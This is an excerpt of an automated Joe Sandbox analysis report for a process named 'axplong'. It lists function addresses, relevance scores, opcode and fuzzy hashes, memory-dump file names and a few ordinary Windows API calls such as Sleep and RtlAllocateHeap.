Opcode Fuzzy Hash: 3353a7e79f846b844297df7447d29d2b57c6084159eaba0abd178fea355a65e9
Instruction Fuzzy Hash: 48414A75904314AEDF24EFB5E941AEBBBF9EF89300B10442DF856E3614EA30A904CB61

Function 00926C99 Relevance: 3.1, APIs: 2, Instructions: 89
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000007.00000002.3352145321.00000000008F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000007.00000002.3352019887.00000000008F0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352145321.0000000000952000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352511104.0000000000959000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000AEF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000BCC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000BFE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000C0B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000C19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354225783.0000000000C1A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354805329.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354896397.0000000000DC4000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_8f0000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1e677539520ca8fa60059080647c5d593a28811f0b62fd2fa71fe5fe6097663
Instruction ID: a331656ce36ed87ddbdabd2b92ee89aa6d0eedcae13382f9e433ea60b2e9298f
Opcode Fuzzy Hash: c1e677539520ca8fa60059080647c5d593a28811f0b62fd2fa71fe5fe6097663
Instruction Fuzzy Hash: FD210A329052287AEB11BBA4BC42F9F772D9F82338F210310F9343B1D5D7706E0596A1

Function 0092D4F4 Relevance: 1.7, APIs: 1, Instructions: 198
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000007.00000002.3352145321.00000000008F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000007.00000002.3352019887.00000000008F0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352145321.0000000000952000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352511104.0000000000959000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000AEF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000BCC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000BFE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000C0B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000C19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354225783.0000000000C1A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354805329.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354896397.0000000000DC4000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_8f0000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a1fe5521ea2fcceceb7fa4fc22b86f7c6b8e3477619c9cf72462b93518d26c5
Instruction ID: 743d630e1eeefd5c370988ced7939f0be65da4847e57d8720250e46e530cc70a
Opcode Fuzzy Hash: 2a1fe5521ea2fcceceb7fa4fc22b86f7c6b8e3477619c9cf72462b93518d26c5
Instruction Fuzzy Hash: DA612672D062348FDF21EFA8F884BEDB7A8AF95314F244015E444A729CC7718C048B91

Function 008F82B0 Relevance: 1.7, APIs: 1, Instructions: 159
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNELBASE(?), ref: 008F8454

Memory Dump Source

Source File: 00000007.00000002.3352145321.00000000008F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000007.00000002.3352019887.00000000008F0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352145321.0000000000952000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352511104.0000000000959000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000AEF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000BCC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000BFE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000C0B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000C19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354225783.0000000000C1A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354805329.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354896397.0000000000DC4000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_8f0000_axplong.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: 84b34d51915adcfe81bb42ef3412a63b49c5e6c0813a83cb8dade311cc7dd845
Instruction ID: 5361d54d0a9fdff2ed1494e48d7a22c4c77719bc1fd3c09e56fc305a58d203fe
Opcode Fuzzy Hash: 84b34d51915adcfe81bb42ef3412a63b49c5e6c0813a83cb8dade311cc7dd845
Instruction Fuzzy Hash: BE512771D0421CDBEB14EB78CD457EDB775EB56314F504298E904E72D1EF309A808BA5

Function 00926F71 Relevance: 1.6, APIs: 1, Instructions: 56
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SystemTimeToTzSpecificLocalTime.KERNELBASE(00000000,?,?), ref: 00926FB3

Memory Dump Source

Source File: 00000007.00000002.3352145321.00000000008F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000007.00000002.3352019887.00000000008F0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352145321.0000000000952000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352511104.0000000000959000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000AEF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000BCC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000BFE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000C0B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000C19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354225783.0000000000C1A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354805329.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354896397.0000000000DC4000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_8f0000_axplong.jbxd

Yara matches

Similarity

API ID: Time$LocalSpecificSystem
String ID:
API String ID: 2574697306-0
Opcode ID: e53a0d8b67f6a9f016665ad3a5f75d7970fb5e14a94a4b0484b8b61195830080
Instruction ID: aa8cd4d67f99fe4b8f2cc6240c86b7fb3857994913a13237d215d5c132ae7a54
Opcode Fuzzy Hash: e53a0d8b67f6a9f016665ad3a5f75d7970fb5e14a94a4b0484b8b61195830080
Instruction Fuzzy Hash: F0111FB290020CAFDF00DEA5E980EDFB7BCAF48310F504666E511E2180E770EB44CB61

Function 0092D6EF Relevance: 1.5, APIs: 1, Instructions: 40
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00000003,0092A5ED,?,009274AE,?,00000000,?), ref: 0092D730

Memory Dump Source

Source File: 00000007.00000002.3352145321.00000000008F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000007.00000002.3352019887.00000000008F0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352145321.0000000000952000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352511104.0000000000959000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000AEF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000BCC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000BFE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000C0B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000C19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354225783.0000000000C1A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354805329.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354896397.0000000000DC4000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_8f0000_axplong.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 7153ed3f708611dc62c49f2530077b45c1b8af34c882a332cd1fe22fe92dd4b7
Instruction ID: cc5786806b1c7ae84e03e0342d88abf733507a652fd298057554365df65101d5
Opcode Fuzzy Hash: 7153ed3f708611dc62c49f2530077b45c1b8af34c882a332cd1fe22fe92dd4b7
Instruction Fuzzy Hash: 15F0E97164B135669F227A22BC01B5B3B9DAF817B0B184511AC08EA199CF38ED0047E1

Function 0092AF0B Relevance: 1.5, APIs: 1, Instructions: 33memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00906B27,?,?,0090D32C,00906B27,?,009078FB,8B18EC84,04AD0A3C), ref: 0092AF3D

Memory Dump Source

Source File: 00000007.00000002.3352145321.00000000008F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000007.00000002.3352019887.00000000008F0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352145321.0000000000952000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352511104.0000000000959000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000AEF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000BCC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000BFE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000C0B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000C19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354225783.0000000000C1A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354805329.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354896397.0000000000DC4000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_8f0000_axplong.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 2fb9d08dcb112d22d3c741da01aad5ca931bf0a4bdd241c8097e52130da1ba22
Instruction ID: 2d9669bf25a1939cbf1214642c0ea1c2fba55796cc041038e4d567ccf529619f
Opcode Fuzzy Hash: 2fb9d08dcb112d22d3c741da01aad5ca931bf0a4bdd241c8097e52130da1ba22
Instruction Fuzzy Hash: F7E02B6321A23157EB2132667E00BDB368DAF813B1F150051AC58A21ACCF1CDC0052E3

Function 00906AE0 Relevance: 1.3, APIs: 1, Instructions: 40sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE ref: 00906B65

Memory Dump Source

Source File: 00000007.00000002.3352145321.00000000008F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000007.00000002.3352019887.00000000008F0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352145321.0000000000952000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352511104.0000000000959000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000AEF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000BCC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000BFE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000C0B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000C19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354225783.0000000000C1A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354805329.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354896397.0000000000DC4000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_8f0000_axplong.jbxd

Yara matches

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 6ba381a8b63636794cbf8e80cdd44504eb3e9b39f612ff4331350ab69b195488
Instruction ID: 75a07da6e0233a3af3c05c89d1887db8b75401fc820b232d6181055d253dcef8
Opcode Fuzzy Hash: 6ba381a8b63636794cbf8e80cdd44504eb3e9b39f612ff4331350ab69b195488
Instruction Fuzzy Hash: 6DF0D171E14608ABC600BBB99D06B1DBB74EB87760F800358E911672E1DB346A0487E3

Function 04B40D6D Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3366105251.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4b40000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c74f8064646c49f8db88b420f908c2524f49c2c888a7d6efd128b500da66b27b
Instruction ID: eb04bdc2d1a12b0096e9e5f6daf54310dc802b417df1237ffbbfd43190cd87ea
Opcode Fuzzy Hash: c74f8064646c49f8db88b420f908c2524f49c2c888a7d6efd128b500da66b27b
Instruction Fuzzy Hash: FA01B1FB6481217E7201E5862B50AFBA7AEE9C6630330887AF906C6505F2A45A097132

Function 04B40D67 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3366105251.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4b40000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 81840fe0776f8934f09d032c0a07bc9b365e2aed5d0ab8a4f233f2181a66071a
Instruction ID: 9d72d4e2a56b331ecd0d5a120e55baa857fefdc43a019fd42f4347f85df4c4d2
Opcode Fuzzy Hash: 81840fe0776f8934f09d032c0a07bc9b365e2aed5d0ab8a4f233f2181a66071a
Instruction Fuzzy Hash: 32013CFB6481207D7102E5852B54EFBAB6DD9CAB3033088ABFA47C6505F2A42F5D7132

Function 04B40DA4 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3366105251.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4b40000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14d05038ba26f7459f8da88b43306588212e76a208bceddf582b82b79be35028
Instruction ID: 1ae6499b83519a94412648127a6ed5b89d019798ad9b71c1a4689731896fd1f5
Opcode Fuzzy Hash: 14d05038ba26f7459f8da88b43306588212e76a208bceddf582b82b79be35028
Instruction Fuzzy Hash: 48F0E9FB648010AD3210F1863750AF7676DD4CA6303708C67FA0AC7900F1902F1D7472

Function 04B40DAD Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3366105251.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4b40000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4c096d8f3487cd8e48e55135ba30b557290c68b93aed04e74125e43161c15c7
Instruction ID: 06b8268b714bc5f24c738e2193bb6f1ec79a9f1cd0da57da46318adfa5140e4c
Opcode Fuzzy Hash: b4c096d8f3487cd8e48e55135ba30b557290c68b93aed04e74125e43161c15c7
Instruction Fuzzy Hash: ECF0E2FB648020BD7101E6863B54AF7A72DD9CA7303308C67FA06C6501F2A02F297532

Function 04B40E6F Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3366105251.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4b40000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a314999ce5e282ba5f07e080ae602bb3d790cca2716f12ac60ca520b4ba46c8
Instruction ID: ea4ad3e63a86683fd6f7fbddb30ff88e15ccf6d549dde976639330568d15c520
Opcode Fuzzy Hash: 5a314999ce5e282ba5f07e080ae602bb3d790cca2716f12ac60ca520b4ba46c8
Instruction Fuzzy Hash: FCF059E79881125E9F6179F681881E33F72ABD39303212C99D182C2215F5527BA6B884

Function 04B40DEA Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3366105251.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4b40000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48c1bbb225b07be40e714847f4352908cc9bfb827403b11f2f3ace8ee505fd96
Instruction ID: 6a50d2dac7bfc477cd01136b4eb3dedec99ce771d1fe2ec3c93722c1f077a5a9
Opcode Fuzzy Hash: 48c1bbb225b07be40e714847f4352908cc9bfb827403b11f2f3ace8ee505fd96
Instruction Fuzzy Hash: DCE092FBA481207D7601B1D13711AFBAB1DD5CAA303309C7BFA02C6001E2900F597472

Function 04B40DFE Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3366105251.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4b40000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b50eb7291fa65761aa4435a4a1471a172bb47641c4bc550f39aac350d3727c5c
Instruction ID: 411c4f7c759d607803bdb5a44a28f9cf46edb5639621176ff0a68519efbc2df8
Opcode Fuzzy Hash: b50eb7291fa65761aa4435a4a1471a172bb47641c4bc550f39aac350d3727c5c
Instruction Fuzzy Hash: 0EE04FF7A491256DB602BAC12F149FBA728D9C6E303308D6AF506CA005E6A14F2A7572

Function 04B40E39 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3366105251.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4b40000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d5ec979a4f626b0b243f07ba3444629733afbf02055889f3ba783388671d2f3
Instruction ID: 8bb610dec399ac06996d8639cfcfbe4aade094c286cab051761ee277e320b643
Opcode Fuzzy Hash: 2d5ec979a4f626b0b243f07ba3444629733afbf02055889f3ba783388671d2f3
Instruction Fuzzy Hash: 0BC08CEBD444021F4E00B5E4998EBEB7E16D9C2C323272E15E441474247693892369D1

Function 04B40E25 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3366105251.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4b40000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aeb23445d7a8f7c9ebbcbd15cba82cbce57a267a7420a0feefa24352a4bcfb6b
Instruction ID: 25ea0b2e67d9dc3387805b818e908c4b973ac29665abd16432d3e4071504b614
Opcode Fuzzy Hash: aeb23445d7a8f7c9ebbcbd15cba82cbce57a267a7420a0feefa24352a4bcfb6b
Instruction Fuzzy Hash: 53C012B75040118EA910B5D626855B9B71199856353341C62E655CB210E6D11727AA91

Non-executed Functions

Function 00933068 Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1340COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 009331E3

Strings

1#IND, xrefs: 00934373
1#QNAN, xrefs: 00934381
1#INF, xrefs: 0093439E
1#SNAN, xrefs: 0093437A

Memory Dump Source

Source File: 00000007.00000002.3352145321.00000000008F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000007.00000002.3352019887.00000000008F0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352145321.0000000000952000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352511104.0000000000959000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000AEF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000BCC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000BFE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000C0B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000C19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354225783.0000000000C1A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354805329.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354896397.0000000000DC4000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_8f0000_axplong.jbxd

Yara matches

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 66ec1d32905d0fa89759f162d76e7abcd686f4de985bca7c4b22a4d120cbd824
Instruction ID: a4bb6f97dc7e309c09c3816befbdeded26742a86fcd08515ea9277f1d459629a
Opcode Fuzzy Hash: 66ec1d32905d0fa89759f162d76e7abcd686f4de985bca7c4b22a4d120cbd824
Instruction Fuzzy Hash: F7C24F71E486288FDB25CF28DD407EAB7B9EB44305F1585EAD84DE7240E778AE858F40

Function 00932BD0 Relevance: 3.4, APIs: 2, Instructions: 450COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3352145321.00000000008F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000007.00000002.3352019887.00000000008F0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352145321.0000000000952000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352511104.0000000000959000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000AEF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000BCC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000BFE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000C0B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000C19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354225783.0000000000C1A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354805329.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354896397.0000000000DC4000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_8f0000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bf072589c0c8c6daaa14a71d751704f1d0fc013c2abe94fbb674223392015af
Instruction ID: ca920a58e772e9ed5099c470a3d9370412a7c08761614d8723250890178eaced
Opcode Fuzzy Hash: 5bf072589c0c8c6daaa14a71d751704f1d0fc013c2abe94fbb674223392015af
Instruction Fuzzy Hash: A8F12E71E012199FDF14CFA9C8806AEB7B5FF88314F158269E919AB385D731AE41CF90

Function 0090CB1A Relevance: 1.5, APIs: 1, Instructions: 16timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimePreciseAsFileTime.KERNEL32(?,0090CE82,?,?,?,?,0090CEB7,?,?,?,?,?,?,0090C42D,?,00000001), ref: 0090CB33

Memory Dump Source

Source File: 00000007.00000002.3352145321.00000000008F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000007.00000002.3352019887.00000000008F0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352145321.0000000000952000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352511104.0000000000959000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000AEF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000BCC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000BFE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000C0B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352609024.0000000000C19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354225783.0000000000C1A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354805329.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3354896397.0000000000DC4000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_8f0000_axplong.jbxd

Yara matches

Similarity

API ID: Time$FilePreciseSystem
String ID:
API String ID: 1802150274-0
Opcode ID: 1fc97fe0167b4f88ec714515d4e01d34b354d1d6fcb3520136942157452759e5
Instruction ID: f3d69ee5095dcd0a94796bd185bca6e9e4c3084bad69bb9b45ba471d36aab5ce
Opcode Fuzzy Hash: 1fc97fe0167b4f88ec714515d4e01d34b354d1d6fcb3520136942157452759e5
Instruction Fuzzy Hash: 3BD0223251B1389BCA012B94AC04CACBB0C9B01B613004212EE04231A08A606C00BBD0

Function 00927D83 Relevance: 1.5, Strings: 1, Instructions: 216COMMON

Download Yara Rule

Strings

0, xrefs: 00927EFF

Memory Dump Source

Source File: 00000007.00000002.3352145321.00000000008F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000007.00000002.3352019887.00000000008F0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3352145321.0000000000952000.00000040.00000001.01000000.00000007.sdmpDownload File
